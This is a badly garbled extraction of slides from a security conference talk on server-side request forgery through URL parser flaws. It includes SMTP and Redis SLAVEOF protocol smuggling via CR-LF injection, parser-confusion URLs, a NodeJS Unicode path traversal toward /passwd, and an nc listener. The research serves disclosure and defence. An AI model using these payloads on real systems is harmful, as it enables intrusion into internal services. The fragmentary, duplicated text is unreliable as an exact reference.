Transcription of A New Era of SSRF - Exploiting URL Parser in Trending ...
1 A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages!Orange TsaiTaiwan Orange TsaiThe most professional red team in TaiwanAbout Orange TsaiThe largest hacker conference in Taiwanfounded by Orange TsaiSpeaker-Speaker at several security conferencesHITCON, WooYun, AVTokyoCTFer-CTFs we won champions /in finalists (as team HITCON)DEFCON, Codegate, Boston Key Party, HITB, Seccon, 0 CTF, WCTFB ountyHunter-Vendors I have found Remote Code ExecutionFacebook, GitHub, Uber, Apple, Yahoo, ImgurAbout Orange TsaiAgendaIntroductionMake SSRF great againIssues that lead to SSRF-BypassIssues that lead to protocol smugglingCase studies and DemosMitigationsWhat is SSRF?
2 Server Side Request ForgeryBypass firewall , Touch IntranetCompromise Internal servicesStruts2 RedisElasticProtocol Smuggling in SSRFMake SSRF more powerfulProtocols that are suitable to smuggleHTTP based protocolElastic, CouchDB, Mongodb, DockerText-based protocolFTP, SMTP, Redis, MemcachedQuick Fun Fun ExamplePython is so HardQuick Fun ExampleCR-LF Injection on HTTP protocolSmuggling SMTP protocol over HTTP :25/%0D%0 AHELO >>GET /<<421 ubuntuRejecting open proxy localhost [ ]>>HELO closedSMTP Hates HTTP ProtocolIt Seems UnexploitableGopher Is GoodWhat If There Is No Gopher Support?
3 HTTPSWhat Won't Be Encrypted in a SSL Handshake?Quick Fun %0D%0 AHELO :25/$ tcpdump-ilo -qw-tcpport 25 | xxd000001b0: 009c 0035 002f c030 c02c 003d 006a 0038 .. ,.=. : 0032 00ff 0100 0092 0000 0030 002e 0000 . : 2b31 3237 2e30 2e302e31 200d 0a48 454c + ..HEL000001e0: 4f20 6f72 616e 6765 2e74 770d 0a4d 4149 O : 4c20 4652 4f4d 2e2e 2e0d 0a11 000b 0004 L : 0300 0102 000a 001c 001a 0017 0019 001c ..CR-LF Injection on HTTPS protocolExploit the Unexploitable-Smuggling SMTP over TLS SNIQ uick Fun ExampleCR-LF Injection on HTTPS protocolExploit the Unexploitable-Smuggling SMTP over TLS %0D%0 AHELO :25/$ tcpdump-ilo -qw-tcpport 25 | xxd000001b0: 009c 0035 002f c030 c02c 003d 006a 0038.
4 ,.=. : 0032 00ff 0100 0092 0000 0030 002e 0000 . : 2b31 3237 2e30 2e302e31 200d 0a48 454c + ..HEL000001e0: 4f20 6f72 616e 6765 2e74 770d 0a4d 4149 O : 4c20 4652 4f4d 2e2e 2e0d 0a11 000b 0004 L : 0300 0102 000a 001c 001a 0017 0019 001c ..Quick Fun ExampleCR-LF Injection on HTTPS protocolExploit the Unexploitable-Smuggling SMTP over TLS %0D% :25/$ tcpdump-ilo -qw-tcpport 25 | xxd000001b0: 009c 0035 002f c030 c02c 003d 006a 0038 .. ,.=. : 0032 00ff 0100 0092 0000 0030 002e 0000 . : 2b31 3237 2e30 2e302e31 200d 0a48 454c+ ..HEL000001e0: 4f20 6f72 616e 6765 2e74 770d 0a4d 4149O : 4c20 4652 4f4d2e2e 2e0d 0a11 000b 0004 L : 0300 0102 000a 001c 001a 0017 0019 001c.
5 Quick Fun ExampleCR-LF Injection on HTTPS protocolExploit the Unexploitable-Smuggling SMTP over TLS %0D% :25/$ tcpdump-ilo -qw-tcpport 25>>.. ,.=. + <<500 Command unrecognized: .. ,.=. + >>HELO <<250 ubuntuHello localhost [ ], please meet you>>MAIL FROM: Sender okMake SSRF great AgainURL Parsing IssuesIt's all about the inconsistency between URL Parser and requesterWhy validating a URL is hard? in RFC2396, RFC3986 but just defined a contemporary implementation based on RFC but different languages still have their own implementationsURL Components(RFC 3986) :8042/over/there?
6 Name=bar#noseURL Components(RFC 3986) :8042/over/there?name=bar#nose( W e o n l y c a r e a b o u t H T T P H T T P S )(I t ' s c o m p l i c a t e d )( I d o n ' t c a r e )( I d o n ' t c a r e )schemeauthority(I t ' s c o m p l i c a t e d )pathfragmentqueryBig PictureLi b r a ri es/V u lnsCR-LFI n j e c t i o nU R L P a r s i n gP a t hH o s tSNIP o r tI n j e c t i o nH o s tI n j e c t i o nP a t h I n j e c t i o nP y t h o nh t t p l i b P y t h o n u r l l i b P y t h o n u r l l i b 2 R u b y N e t : : H T T P J a v a n e t.
7 U R L P e r l L W P N o d e J S h t t p P H P h t t p _ w r a p p e r W g e t c U R L Consider the following PHP code$url='http://'. $_GET[url];$parsed=parse_url($url);if( $parsed[port] ==80 &&$parsed[host] ==' ') {readfile($url);} else{die('You Shall Not Pass');}Abusing URL :11211:80/Abusing URL :11211:80/PHP readfilePerl LWPPHP parse_urlPerl URIA busing URL ParsersRFC3986authority = [ userinfo"@" ] host [ ":" port ]port = *DIGIT host = IP-literal / IPv4address / reg-namereg-name = *( unreserved / pct-encoded / sub-delims)unreserved = ALPHA / DIGIT / "-" / ".
8 " / "_" / "~"sub-delims= "!" / "$" / "&" / "'" / "(" / ")" /"*" / "+" / "," / ";" / "="Abusing URL URL parse_urlPHP readfileAbusing URL ParsersSeveral programing languages suffered from this issuecURL, PHP, PythonRFC3968 section authority component is preceded by a double slash ("//") and is terminated by the next slash ("/"), question mark ("?"), or number sign ("#") character, or by the end of the URIA busing URL ParsersHow About URL URL ParsersAbusing URL Parsersc U R L / l i b c u rlP H P p a r se_ u rl P er l UR I R u b y u r iR u b y a d d r ess able N o d eJ Surl J a v a net.
9 U R LP y t h on u r l p arseG o net /url Report the bug to cURLteam and get a patch quickly Bypass the patch with a spaceAbusing URL Again "curl doesn't verify that the URL is 100% syntactically correct. It is instead documented to work with URLs and sort of assumes that you pass it correct input"Won't FixBut previous patch still applied on the following NodeJScodeNodeJSUnicode Failurevarbase =" ";varpath = ;if( ("..") ==-1) { (base +path, callback);}NodeJSUnicode /passwdNodeJSUnicode \xFF\x2E\xFF\x2E/passwdNodeJSUnicode \xFF\x2E\xFF\x2E/passwdNodeJSUnicode new.
10 /(in NodeJSHTTP)(U+FF2E) Full width Latin capital letter NWhat the ____NodeJSUnicode FailureHTTP module prevents requests from CR-LF InjectionEncode the New-lines as URL :6379/\r\nSLAVEOF 6379\r\n$ nc-vvlp6379>>GET /%0D%0 ASLAVEOF% >>Host: :6379>>Connection: closeNodeJSUnicode FailureHTTP module prevents requests from CR-LF InjectionBreak the protections by Unicode U+FF0D U+FF0 :6379/ SLAVEOF 6379 $ nc-vvlp6379>> GET />> SLAVEOF 6379>> >> Host: :6379>> Connection: closeGLibcNSS FeaturesIn Glibcsource code file #ns_name_pton()/*%* Convert an asciistring into an encoded domain nameas per RFC1035.